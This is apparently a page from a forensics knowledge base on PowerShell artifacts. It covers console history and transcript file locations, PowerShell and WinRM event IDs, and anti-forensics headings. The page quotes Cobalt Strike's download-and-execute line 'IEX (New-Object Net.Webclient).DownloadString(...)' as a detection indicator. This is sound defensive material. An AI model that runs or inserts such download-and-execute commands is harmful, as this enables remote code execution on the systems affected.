PowerShell

File Location:

PowerShell Console History:

The PSReadline module is installed and enabled by default starting from PowerShell v5 on Windows 10 onward. It is responsible for recording what is typed into the console. The default option is to save history to a file.

C:\User\USERNAME\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline
- Records last 4096 commands typed into PS Console for each user account.

PowerShell Transcripts:

This policy setting lets you capture the input and output of Windows PowerShell commands into text-based transcripts.

C:\Users\USERSNAME\Documents\YYYYMMDD\PowerShell_Transcripts.HOSTNAME.##.txt
- Only logs activity within the console.

PowerShell Command History Forensics

PowerShell is fun :)PowerShell and loggingPowerShell is fun :)

Parse Data

Considerations

Event Logs:

400: Engine state is changed from None to Available.
403: The engine status is changed from Available to Stopped. This event records the completion of a PowerShell activity.
600: indicates that providers such as WSMan start to perform a PowerShell activity on the system, for example, “Provider WSMan Is Started”.
Event ID 800 contains pipeline execution details, again the hostname field reveals if we are dealing with a local or remote session and the HostApplication field can indicate malicious PowerShell usage (for example PowerShell being executed with the -enc option

Microsoft-Windows-PowerShell/Operational

4103: Appears when your computer has execution policy restrictions, corrupted modules or insufficient permissions
- 4103 Module Logging is disabled by default. If enabled, it will record portions of scripts, some de-obfuscated code, and some data formatted for output.
4104: Records the script block contents, but only the first time it is executed in an attempt to reduce log volume
- 4104 Can identify potentially malicious script blocks and automatically log them in the PowerShell/Operational log, even with script block logging disabled. Only with PowerShell v5.

Remote Usage

Microsoft-Windows-WinRM/Operational

Powershell remoting uses WinRM.

6: WinRM connection is initialized. (Source host).
91: A successful remote WinRM connection. (Destination host).

PowerShell Logging

Cobalt Strike PowerShell Imports:

Getting the Bacon from Cobalt Strike's Beacon | CrowdStrikecrowdstrike.com

The IEX (New-Object Net.Webclient).DownloadString(‘http://127.0.0.1:22426/’) component of the base64 encoded command is how Cobalt Strike manages imported PowerShell scripts within a Beacon session

PowerShell Import Artifact:

IEX (New-Object Net.Webclient).DownloadString(‘http://127.0.0.1:22426/’)

Anti-Forensics

Deleting log files

Constrained Language Mode (CLM)

Applocker

PreviousCrashes (WER)NextScheduled Tasks

Last updated 26 days ago